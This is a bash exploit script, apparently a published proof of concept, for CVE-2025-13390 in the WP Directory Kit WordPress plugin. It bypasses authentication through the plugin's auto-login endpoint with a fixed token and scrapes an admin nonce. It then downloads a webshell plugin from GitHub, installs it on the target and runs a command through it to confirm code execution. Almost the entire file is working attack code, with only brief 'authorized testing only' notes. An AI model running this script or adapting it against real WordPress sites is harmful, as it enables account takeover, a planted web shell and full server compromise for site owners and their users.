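#!/usr/bin/env bash
# WP Directory Kit <= 1.4.4 - Authentication Bypass to Privilege Escalation via Account Takeover
# Date: 11/09/2025
# Exploit Author: Ryan Kozak
# Vendor Homepage: https://wordpress.org/plugins/wpdirectorykit/
# Version: <= 1.4.4
# CVE : CVE-2025-13390
#
# Usage: ./exploit.sh [TARGET_URL]
#   TARGET_URL  base URL of the WordPress site (default: https://examplesite.com;
#               may also be given via the TARGET environment variable)
#   USER_ID     env: account to auto-login as (default: 1)
#   TOKEN       env: auto-login token for that account (default: c4ca4238a0)
#   PLUGIN_ZIP  env: path to a local, already root-packaged plugin ZIP to upload
#               instead of downloading the public webshell plugin from GitHub
#
# Flow: (1) hit the plugin's ?auto-login= endpoint to obtain a session as
# USER_ID; (2) scrape the plugin-upload nonce from wp-admin/plugin-install.php;
# (3) upload and install a plugin ZIP through wp-admin/update.php; (4) request
# the installed file to confirm code execution.
#
# Requires: bash, curl, GNU grep (-P), unzip, zip.
#
# NOTE(review): for authorized testing only. The installed plugin is NOT removed
# from the target by this script — delete it from wp-admin/plugins.php when the
# engagement is over. The cookie jar created here holds a live admin session,
# so it is kept in a private mktemp directory and removed on exit.
set -euo pipefail

TARGET="${1:-${TARGET:-https://examplesite.com}}"
USER_ID="${USER_ID:-1}"
# NOTE(review): this is the token the original PoC used for user_id=1; how the
# plugin derives it is not shown here — confirm against the plugin source before
# changing USER_ID, and override TOKEN accordingly.
TOKEN="${TOKEN:-c4ca4238a0}"
PLUGIN_ZIP="${PLUGIN_ZIP:-}"
# Whatever is fetched from here runs on the target as the web-server user.
# Pin a reviewed commit (or supply PLUGIN_ZIP) rather than trusting `main`.
WEBSHELL_REPO_ZIP="https://github.com/XK3NF4/webshell-plugin-wordpress/archive/refs/heads/main.zip"
WEBSHELL_PATH="wp-content/plugins/wp_webshell/wp_webshell.php"

die()  { printf '[-] %s\n' "$*" >&2; exit 1; }
warn() { printf '[-] %s\n' "$*" >&2; }
info() { printf '[*] %s\n' "$*"; }
ok()   { printf '[+] %s\n' "$*"; }

for tool in curl grep unzip zip; do
  command -v "$tool" >/dev/null 2>&1 || die "required tool not found: $tool"
done
# The nonce scrape uses \K, which needs GNU grep's -P (BSD/macOS grep lacks it).
printf 'x\n' | grep -qP 'x' 2>/dev/null || die "GNU grep with -P support is required"

# Private scratch dir for the cookie jar and ZIPs; removed on every exit path.
WORKDIR="$(mktemp -d)" || die "mktemp failed"
trap 'rm -rf -- "${WORKDIR:?}"' EXIT
COOKIES="$WORKDIR/cookies.txt"
INSTALL_NONCE=""

#######################################
# Step 1: call the auto-login endpoint and persist the resulting cookies.
# Globals: TARGET, USER_ID, TOKEN (read); COOKIES (written)
# Exits on a transport/HTTP failure; only warns if no login cookie was set,
# because a failed login shows up unmistakably at the nonce step.
#######################################
auto_login() {
  info "Step 1: Auto-login as user_id=$USER_ID and save cookies..."
  curl -sS -f -L -c "$COOKIES" -o /dev/null \
    "$TARGET/?auto-login=1&user_id=$USER_ID&token=$TOKEN" \
    || die "auto-login request failed"
  # An authenticated WordPress session sets a wordpress_logged_in_* cookie;
  # a 200 on its own proves nothing.
  if grep -q 'wordpress_logged_in' "$COOKIES" 2>/dev/null; then
    ok "Auto-login successful"
  else
    warn "No wordpress_logged_in cookie after auto-login; the bypass may not have worked"
  fi
}

#######################################
# Step 2: fetch wp-admin/plugin-install.php and extract the upload-form nonce.
# Globals: TARGET, COOKIES (read); INSTALL_NONCE (written)
# Prefers the _wpnonce that follows the action=upload-plugin form; falls back
# to the first _wpnonce on the page (the original PoC's behaviour). Exits if
# no nonce is found — an empty nonce would only fail later, less clearly.
#######################################
get_nonce() {
  info "Step 2: Getting plugin-upload nonce from plugin-install.php..."
  local page
  page="$(curl -sS -f -L -b "$COOKIES" -c "$COOKIES" "$TARGET/wp-admin/plugin-install.php")" \
    || die "could not fetch wp-admin/plugin-install.php"
  # -z treats the whole page as one record so the match can span lines.
  INSTALL_NONCE="$(printf '%s' "$page" \
    | grep -zoP '(?s)action=upload-plugin.*?name="_wpnonce" value="\K[^"]+' \
    | tr '\0' '\n' | head -1 || true)"
  if [[ -z "$INSTALL_NONCE" ]]; then
    INSTALL_NONCE="$(printf '%s' "$page" \
      | grep -oP 'name="_wpnonce" value="\K[^"]+' | head -1 || true)"
  fi
  [[ -n "$INSTALL_NONCE" ]] \
    || die "no _wpnonce found on plugin-install.php — session is probably not an administrator"
  ok "Install Nonce: $INSTALL_NONCE"
}

#######################################
# Steps 3-4: obtain the plugin ZIP to upload, as $WORKDIR/plugin.zip.
# Globals: PLUGIN_ZIP, WEBSHELL_REPO_ZIP, WORKDIR (read)
# A GitHub branch archive nests the plugin under <repo>-main/, but WordPress
# expects the plugin directory at the ZIP root, so the archive is re-zipped.
#######################################
prepare_plugin() {
  if [[ -n "$PLUGIN_ZIP" ]]; then
    [[ -f "$PLUGIN_ZIP" ]] || die "PLUGIN_ZIP not found: $PLUGIN_ZIP"
    cp -- "$PLUGIN_ZIP" "$WORKDIR/plugin.zip"
    ok "Using local plugin ZIP: $PLUGIN_ZIP"
    return 0
  fi
  info "Step 3: Downloading plugin from GitHub..."
  curl -sS -f -L "$WEBSHELL_REPO_ZIP" -o "$WORKDIR/github.zip" || die "download failed"
  info "Step 4: Extracting and repackaging plugin (WordPress needs plugin dir at ZIP root)..."
  # GitHub ZIP layout: webshell-plugin-wordpress-main/wp_webshell/
  # WordPress wants:   wp_webshell/ at the root
  (
    cd "$WORKDIR" \
      && unzip -q -o github.zip \
      && cd webshell-plugin-wordpress-main \
      && zip -q -r ../plugin.zip wp_webshell/
  ) || die "repackaging failed"
  [[ -s "$WORKDIR/plugin.zip" ]] || die "repackaged ZIP is missing or empty"
  ok "Plugin repackaged"
}

#######################################
# Step 5: upload $WORKDIR/plugin.zip through the core plugin installer.
# Globals: TARGET, COOKIES, INSTALL_NONCE, WORKDIR (read)
# The success check is a string match that may vary by WordPress version or
# locale, so an apparent failure is reported but does not abort: the webshell
# probe that follows is the real confirmation.
#######################################
upload_plugin() {
  info "Step 5: Uploading plugin..."
  local response
  response="$(curl -sS -L -b "$COOKIES" -c "$COOKIES" \
    -F "_wpnonce=$INSTALL_NONCE" \
    -F "pluginzip=@$WORKDIR/plugin.zip" \
    -F "install-plugin-submit=Install Now" \
    "$TARGET/wp-admin/update.php?action=upload-plugin")" || die "upload request failed"
  if grep -qi 'installed successfully\|Plugin installed' <<<"$response"; then
    ok "Plugin installed successfully"
  else
    warn "Installation may have failed. Checking response..."
    # "expired" is WordPress's wording for a rejected nonce — worth surfacing.
    grep -i 'error\|fail\|expired' <<<"$response" | head -5 >&2 || true
  fi
}

#######################################
# Step 6: request the installed file with cmd=id and print whatever comes back.
# Globals: TARGET, WEBSHELL_PATH (read)
# Outputs: the response body on stdout when non-empty.
#######################################
test_webshell() {
  info "Step 6: Testing webshell..."
  local url="$TARGET/$WEBSHELL_PATH?cmd=id"
  local response
  info "Making request to: $url"
  response="$(curl -sS "$url")" || die "request to webshell failed"
  if [[ -n "$response" ]]; then
    ok "Webshell is accessible!"
    ok "Response:"
    printf '%s\n' "$response"
  else
    warn "Webshell may not be accessible or returned empty response"
  fi
}

main() {
  auto_login
  get_nonce
  prepare_plugin
  upload_plugin
  test_webshell
  # Cookie jar and ZIPs are removed by the EXIT trap on WORKDIR.
  info "Cleanup complete"
}

main "$@"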